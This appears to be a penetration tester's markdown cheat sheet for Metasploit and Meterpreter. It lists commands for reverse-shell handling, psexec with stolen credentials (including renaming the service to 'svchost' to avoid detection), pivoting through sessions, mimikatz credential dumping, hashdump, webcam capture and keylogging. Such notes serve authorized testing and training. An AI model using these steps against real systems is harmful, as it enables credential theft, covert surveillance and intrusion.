# Metasploit
### Common Uses
Using the `exploit/multi/handler` to catch reverse shells and manage several sessions. Make sure that you have the correct payload to catch.
Use the `exploit/windows/smb/psexec` module with known credentials to create easy meterpreter sessions to pivot and exploit further. Can set the `SERVICE_FILENAME` option to remove the random garbage used, because its suspicious (using something like `svchost` helps hide!).
### Meterpreter
Payload with fancy shell, series of DLLs injected into a process memory and doesnt touch the disk, no separate process created. All comms over meterpreter are TLS encrypted unless specifically told not to.
```bash
# Below adds a port fwd, localhost:1234 -> meterpreter -> 10.0.0.1:22
meterpreter > portfwd add -l 1234 -p 22 -r 10.0.0.1
# Below adds a route to move all traffic for a subnet thru meterpreter session #1
msf > route add [subnet] [netmask] [session id]
msf > route add 10.0.1.0 255.255.255.0 1 # routes thru session 1 for 10.0.1.0/24
msf > route add 10.0.0.5 255.255.255.255 1 # routes thru session 1 for host 10.0.0.5
```
#### Managing Meterpreter Sessions
Sessions are managed with the `sessions -l` command. Channels inside of sessions are managed with `channels -l` command. Upgrade existing shells with the `sessions -u 1` command.
`CTRL-Z` will background a channel or session
Load additional modules using `use [module name]`
#### Mimikatz in Meterpreter
We can load mimikatz directly into a running meterpreter session, giving us serious power. Need to be running as `SYSTEM`, and we need to make sure the process we're in is the same architecture as the host.
Check if we're in matching arch types with `sysinfo`. Check the `Architecture` and `Meterpreter` info to make sure they match. If we need to move, check which running processes have the correct arch and are running as `SYSTEM` also with `ps -A x64 -s`, then we can move with `migrate [PID]`. Validate the arch and meterpreter types match with `sysinfo` again.
Now we can import the mimikatz module with `load kiwi`. Running `help` will show our new mimikatz commands we can use. Using `creds_all` will dump all available hashes and plaintext passwords!
#### Meterpreter Commands
| Command | Function |
| ---------------------------------------------------------------------------------------------------- | ------------------------------------------------------- |
| `help` | shows all available commands |
| `sysinfo` | Shows computer name, OS, and kernel information |
| `shell` | Launch a command shell on the host |
| `getpid` | show process ID of current meterpreter process |
| `getuid` | shows current user ID meterpereter is running under |
| `ps` | get list of processes |
| `migrate` | attempts to move to a different process ID |
| `cd` / `lcd` | change dir, local change dir |
| `ls` / `lls` | list contents, local list contents |
| `download` | download a file from the machine |
| `upload` | upload a file to the machine |
| `edit` | edit a file using vi or nano |
| `ipconfig` | show host networking information |
| `route` | displays, adds, or deletes host routing table |
| `portfwd` | forwards traffic to a different location as a TCP relay |
| `creds_all` | Mimikatz meterpreter module as kiwi |
| `hashdump` | gather hashes from host memory, requires SYSTEM privs |
| `run hashdump` | Pulls from the registry (SAM and Syskey) |
| `run post/windows/gather/smart_hashdump` | Gathers from the disk NTDS.dit and SAM |
| `run post/windows/gather/hashdump` | Pulls from registry (SAM and Syskey) |
| `screenshot -p /tmp/screen.jpg` | grabs a screenshot of the desktop |
| `uictl` | Turn user devices on or off |
| webcam\_list
webcam\_snap
| Take control of a webcam available to the host |
| keyscan\_start
keyscan\_dump
keyscan\_stop
| Keystroke logger to gather information as its typed |
### Arsenal
Modular combination of scanners, exploits, payloads, and post modules.
| User Interface | Purpose |
| -------------- | -------------------------------------------------------------------------------- |
| `msfconsole` | Basic MSF prompt for exploitation |
| `msfd` | Daemon listening on TCP 55554 allowing msfconsole access to anyone that connects |
| `msfrpcd` | XMLRPC controlled MSF, default TCP 55553 using SSL |
| `msfcli` | MSF with all options specified in a single command, useful for scripting |
| `msfvenom` | Used to generate malicious payloads and binaries |
### Modules
| Module Name | Purpose |
| ----------- | ---------------------------------------------------------- |
| `auxiliary` | Port scanners, DoS tools, login checks, etc |
| `encoders` | Convert exploits and payloads to attempt to bypass filters |
| `exploits` | Exploits used to attack a system |
| `nops` | Create NOP sleds |
| `payloads` | Huge list of payloads based on system and type |
| `post` | Post-exploitation modules to futher exploit a system |
### Troubleshooting
Having issues importing a module? make sure that you check the logs at `~/.msf4/logs/framework.log`